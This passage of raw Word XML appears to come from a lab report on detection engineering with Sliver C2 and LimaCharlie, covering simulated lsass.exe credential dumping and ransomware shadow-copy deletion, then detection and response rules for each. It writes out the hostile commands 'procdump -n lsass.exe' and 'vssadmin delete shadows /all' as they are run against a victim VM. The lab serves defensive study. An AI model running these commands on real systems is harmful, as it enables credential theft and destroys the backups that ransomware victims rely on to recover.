        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Conducting lsass.exe Memory Dump Attack </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Executing lsass.exe memory dump:</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Performing a memory dump of the lsass.exe process stands as a quintessential tactic favored by adversaries for credential theft on a system.</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Dump the lsass.exe process from memory and save it locally on the Sliver C2 server</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rPr>
        <w:t>procdump -n lsass.exe -s lsass.dmp</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This command facilitates the extraction of the lsass.exe process from memory, preserving it in a dump file on the Sliver C2 server for further analysis.</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Detection and Response:</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Transitioning to the LimaCharlie platform, we leverage its capabilities to detect and respond to the adversary's activities.</w:t>
      </w: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Locating Relevant Telemetry:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> As lsass.exe is a high-value target often exploited for credential dumping, LimaCharlie's Event Detection and Response (EDR) capabilities generate events relevant to this activity.</w:t>
      </w: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Filtering Event Timeline:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access the Timeline of the Windows VM sensor within LimaCharlie and utilize the "Event Type Filters" to isolate "SENSITIVE_PROCESS_ACCESS" events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5622290" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="16510" b="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32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5622290" cy="3695700"/>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 xml:space="preserve">Creating Detection Rule: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Craft a detection rule tailored to identify events indicative of lsass.exe access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3667760" cy="2475865"/>
            <wp:effectExtent l="0" t="0" r="8890"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33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3667760" cy="247586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01640" cy="1072515"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="19" name="Picture 19" descr="Screenshot 2024-03-01 11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3-01 112818"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5501640" cy="107251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This rule specifically targets SENSITIVE_PROCESS_ACCESS events where the accessed process ends with lsass.exe, a hallmark of credential theft attempts.</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 xml:space="preserve">Defining Response Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configure the response action for the detection rule to promptly mitigate potential threats.</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7830" cy="799465"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:docPr id="20" name="Picture 20" descr="Screenshot 2024-03-01 1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3-01 112831"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5497830" cy="79946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This response action triggers a report named "LSASS access" upon detection of suspicious lsass.exe access events.</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 xml:space="preserve">Testing Rule: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Validate the efficacy of the detection rule by testing it against a relevant event.</w:t>
      </w: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Click "Target Event" below the created rule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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086985" cy="1506855"/>
            <wp:effectExtent l="0" t="0" r="18415" b="17145"/>
            <wp:docPr id="3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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5086985" cy="1506855"/>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Examine the raw event and simulate a test scenario by clicking "Test Event" to assess rule effectiveness.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once confirmed, save the rule as "LSASS Accessed" and ensure its activation for ongoing threat monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Verification of Detection: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Being adversal again:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> The lsass.exe dump command is re-executed in the Sliver Shell from Attacter VM in order to detect it.</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Detect LSASS Access:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access the Detections tab in LimaCharlie to locate identified threats.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Locate the "LSASS access" detection signature, indicating successful detection of the lsass.exe memory dump activity.</w:t>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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5657215" cy="1263015"/>
            <wp:effectExtent l="0" t="0" r="635" b="13335"/>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37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5657215" cy="126301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rPr>
        <w:t>Review Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Expand the "LSASS access" entry to examine the raw event, gaining insights into the detected activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">or further context and correlation, the "View Event Timeline" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>can be selected and viewed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5610860" cy="3936365"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6985"/>
            <wp:docPr id="2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56"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5610860" cy="3936365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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5.8 Conducting Ransomware Attack &amp; Detection and Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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Conducting Ransomware Attack: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Ransomware attacks represent a significant threat in the cybersecurity landscape, often characterized by their destructive nature and extortion tactics. These attacks frequently employ predictable actions to maximize impact and compel victims to pay ransom. One such action involves the deliberate deletion of volume shadow copies (VSS), a feature in Windows operating systems that enables users to restore files to previous versions.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deletion of VSS serves as a strategic maneuver by ransomware operators to hinder recovery efforts and increase the likelihood of victims succumbing to ransom demands. By eradicating VSS, attackers limit the ability of victims to restore encrypted files, thereby escalating the urgency and severity of the ransomware incident.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Deletion of Volume Shadow Copies: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Victim shell can be accessed through the interactive Sliver shell by executing the ‘shell’ command</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803900" cy="1772285"/>
            <wp:effectExtent l="0" t="0" r="6350" b="18415"/>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39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5803900" cy="1772285"/>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Execute the command to delete volume shadow copies in the Sliver C2 shell on the victim machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vssadmin delete shadows /all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:u w:val="none"/>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Executing this command generates the necessary telemetry for detection and response, regardless of the availability of volume shadow copies on the victim machine.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Run whoami acoomad to verify the active shell access</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u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>hoami</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Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>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3801110" cy="780415"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="3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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3801110" cy="78041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6"/>
          <w:szCs w:val="26"/>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Detection and Response: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Creating Detection Rule: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Craft a detection rule in the Detection rule section to identify the execution of the vssadmin delete shadows /all command, by traversing through Detections tab &gt; Shadow Cpoies Deletion detection &gt; View event timeline &gt; Build D&amp;R rule.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02275" cy="2715260"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8890"/>
            <wp:docPr id="28" name="Picture 28" descr="Screenshot 2024-03-01 1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3-01 113511"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5502275" cy="271526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Defining Response Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Specify the response action to be triggered upon detection of the ransomware activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="24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318760" cy="1323340"/>
            <wp:effectExtent l="0" t="0" r="15240" b="10160"/>
            <wp:docPr id="29" name="Picture 29" descr="Screenshot 2024-03-01 1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3-01 113526"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5318760" cy="132334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"action: report" section generates a detection report, while the "action: task" section terminates the parent process responsible for the ransomware activity.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Testing Rule:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute the vssadmin delete shadows /all command again within the Sliver C2 session to trigger the detection and response rule.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Execute the command to delete volume shadow copies</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vssadmin delete shadows /all</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543550" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543550" cy="942975"/>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Verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Verify the effectiveness of the detection and response rule by checking if the system shell is still active.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Check for active system shell</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>hoami</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66870" cy="702945"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="3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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4166870" cy="702945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>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Successful termination of the parent process indicates the efficacy of the detection and response mechanism in mitigating ransomware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By meticulously following these steps, we proactively detect and respond to ransomware attacks, safeguarding the integrity and availability of critical data within the environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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5.9 Automated YARA Scanning Implementation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 goal is to leverage the advanced capabilities of an Endpoint Detection and Response (EDR) sensor to automatically scan files or processes for the presence of malware based on YARA signatures.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What is YARA?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YARA is a powerful tool primarily utilized for identifying and classifying malware based on textual or binary patterns. Developed by Victor M. Alvarez, YARA enables security professionals to create rules that describe unique characteristics of specific malware families or malicious behaviors. These rules can then be applied to files, processes, or network traffic to detect potential threats. YARA plays a crucial role in threat hunting and incident response by swiftly identifying known and previously unknown malicious elements within compromised systems.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5.9.1 Adding YARA signature for the Sliver C2 payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
